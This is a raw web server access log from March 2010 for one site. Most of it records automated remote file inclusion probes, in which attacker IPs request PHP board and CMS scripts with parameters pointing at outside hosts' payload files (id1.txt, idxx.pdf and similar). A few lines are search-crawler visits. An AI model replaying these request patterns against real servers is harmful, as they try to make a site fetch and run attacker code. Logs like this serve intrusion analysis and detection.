58.150.99.144 - - [06/Mar/2010:16:21:19 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.230.148.90 - - [06/Mar/2010:16:22:47 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.230.148.90 - - [06/Mar/2010:16:22:47 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.230.148.90 - - [06/Mar/2010:16:22:47 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.239.23.19 - - [06/Mar/2010:16:23:31 -0800] "GET /delete_all.php?board_skin_path=http://www.emotions.com.mx/libreria/joomla?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.239.23.19 - - [06/Mar/2010:16:23:31 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.emotions.com.mx/libreria/joomla?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.239.23.19 - - [06/Mar/2010:16:23:31 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.emotions.com.mx/libreria/joomla?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:16:23:38 -0800] "GET /logs/access_100227.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:16:23:52 -0800] "GET /logs/access_100227.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.230.148.90 - - [06/Mar/2010:16:24:00 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.230.148.90 - - [06/Mar/2010:16:24:00 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.230.148.90 - - [06/Mar/2010:16:24:00 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.239.23.19 - - [06/Mar/2010:16:25:51 -0800] "GET /delete_all.php?board_skin_path=http://www.emotions.com.mx/libreria/joomla?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.239.23.19 - - [06/Mar/2010:16:25:51 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.emotions.com.mx/libreria/joomla?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.239.23.19 - - [06/Mar/2010:16:25:51 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.emotions.com.mx/libreria/joomla?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
116.125.126.72 - - [06/Mar/2010:16:33:38 -0800] "GET /skin/daerew_45galleryGD//setup.php?dir=http://www.kecschool.co.kr/upfiles/c055/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "getyourselfahorse.com"
116.125.126.72 - - [06/Mar/2010:16:33:38 -0800] "GET /logs//skin/daerew_45galleryGD//setup.php?dir=http://www.kecschool.co.kr/upfiles/c055/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:16:37:40 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:16:37:41 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:16:37:41 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [06/Mar/2010:16:38:26 -0800] "GET /logs/access.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://respon.fileave.com/zfxidd.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [06/Mar/2010:16:38:26 -0800] "GET /logs///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://respon.fileave.com/zfxidd.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [06/Mar/2010:16:38:26 -0800] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://respon.fileave.com/zfxidd.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:16:38:38 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:16:38:38 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:16:38:38 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:16:39:53 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:16:39:53 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:16:39:53 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [06/Mar/2010:16:42:46 -0800] "GET /logs/access_100227.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://respon.fileave.com/zfxidd.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:16:43:33 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:16:43:33 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:16:43:34 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.195.111.160 - - [06/Mar/2010:16:48:44 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
67.195.111.160 - - [06/Mar/2010:16:48:44 -0800] "GET / HTTP/1.0" 200 899 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
67.195.111.160 - - [06/Mar/2010:16:51:25 -0800] "GET /?M=A HTTP/1.0" 200 899 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
66.135.39.58 - - [06/Mar/2010:16:52:32 -0800] "GET /?sourcedir=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.135.39.58 - - [06/Mar/2010:16:52:32 -0800] "GET /logs/?sourcedir=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.135.39.58 - - [06/Mar/2010:16:52:32 -0800] "GET /logs/access.log/?sourcedir=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.135.39.58 - - [06/Mar/2010:16:52:33 -0800] "GET /logs/access.log/?sourcedir=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.135.39.58 - - [06/Mar/2010:16:52:33 -0800] "GET /logs/?sourcedir=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.135.39.58 - - [06/Mar/2010:16:52:33 -0800] "GET /?sourcedir=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.195.111.160 - - [06/Mar/2010:16:53:18 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
67.195.111.160 - - [06/Mar/2010:17:02:10 -0800] "GET /logs/access_091024.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:06:15 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:06:15 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:06:15 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:06:22 -0800] "GET /logs/access.log%20%20//print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:06:23 -0800] "GET /print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:06:23 -0800] "GET /logs//print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:06:24 -0800] "GET /print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:06:24 -0800] "GET /logs/access.log%20%20//print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:06:24 -0800] "GET /logs//print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:06:25 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:06:25 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:06:26 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:07:35 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:07:39 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:07:40 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:07:40 -0800] "GET /logs/access_100220.log//bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:07:43 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:07:43 -0800] "GET /logs/access_100220.log//bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [06/Mar/2010:17:08:30 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://respon.fileave.com/zfxidd.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [06/Mar/2010:17:08:31 -0800] "GET /write_update.php?board_skin_path=http://respon.fileave.com/zfxidd.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [06/Mar/2010:17:08:31 -0800] "GET /logs//write_update.php?board_skin_path=http://respon.fileave.com/zfxidd.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:08:33 -0800] "GET /logs/access_100220.log//bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:08:50 -0800] "GET /logs/access_100220.log//bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:11:22 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:11:22 -0800] "GET /logs/access.log%20%20//bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:11:22 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:11:31 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:11:31 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:11:31 -0800] "GET /logs/access.log%20%20//bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:13:47 -0800] "GET /logs/access_100220.log%20%20//bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.79.246.80 - - [06/Mar/2010:17:14:15 -0800] "GET /logs/access_100220.log%20%20//bbs/delete_all.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:16:11 -0800] "GET /logs/access.log//print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:16:11 -0800] "GET /logs//print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:16:11 -0800] "GET /print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:17:06 -0800] "GET /logs/access.log//print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:17:06 -0800] "GET /logs//print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:17:06 -0800] "GET /print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:17:21:05 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:17:21:05 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:17:21:06 -0800] "GET /logs/access_100227.log//skin/board/moviefl/download.php?board_skin_path=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:17:21:12 -0800] "GET /logs/access.log//skin/board/moviefl/download.php?board_skin_path=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:22:34 -0800] "GET /yuboard//bbs/write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:22:34 -0800] "GET /logs/access.log%20%20//yuboard//bbs/write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:22:34 -0800] "GET /logs//yuboard//bbs/write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:22:40 -0800] "GET /logs/access_100220.log%20%20//yuboard//bbs/write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:23:09 -0800] "GET /yuboard//bbs/write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:23:09 -0800] "GET /logs//yuboard//bbs/write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:23:09 -0800] "GET /logs/access.log%20%20//yuboard//bbs/write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:17:23:15 -0800] "GET /logs/access_100220.log%20%20//yuboard//bbs/write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
208.98.1.242 - - [06/Mar/2010:17:33:52 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
208.98.1.242 - - [06/Mar/2010:17:33:52 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
208.98.1.242 - - [06/Mar/2010:17:33:52 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
208.98.1.242 - - [06/Mar/2010:17:34:20 -0800] "GET /logs/access_100227.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
208.98.1.242 - - [06/Mar/2010:17:34:20 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
208.98.1.242 - - [06/Mar/2010:17:34:20 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:17:38:46 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:17:38:46 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:17:38:46 -0800] "GET /logs/access.log%20%20//classes/adodbt/sql.php?classes_dir=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:17:39:01 -0800] "GET /logs/access.log%20%20//classes/adodbt/sql.php?classes_dir=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:17:39:01 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:17:39:01 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:17:46:14 -0800] "GET /logs/send_reminders.php?includedir=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:17:46:14 -0800] "GET /send_reminders.php?includedir=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:17:46:14 -0800] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:17:46:18 -0800] "GET /logs/send_reminders.php?includedir=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:17:46:18 -0800] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:17:46:18 -0800] "GET /send_reminders.php?includedir=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:17:46:24 -0800] "GET /logs/access.log//classes/adodbt/sql.php?classes_dir=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.195.111.160 - - [06/Mar/2010:17:52:45 -0800] "GET /logs/ HTTP/1.0" 200 1065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:17:55:04 -0800] "GET /logs/access.log//classes/adodbt/sql.php?classes_dir=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.157.211.204 - - [06/Mar/2010:17:56:55 -0800] "GET /logs//doceboLms//class/class.dashboard_lms.php?where_framework=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
200.157.211.204 - - [06/Mar/2010:17:56:55 -0800] "GET /doceboLms//class/class.dashboard_lms.php?where_framework=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
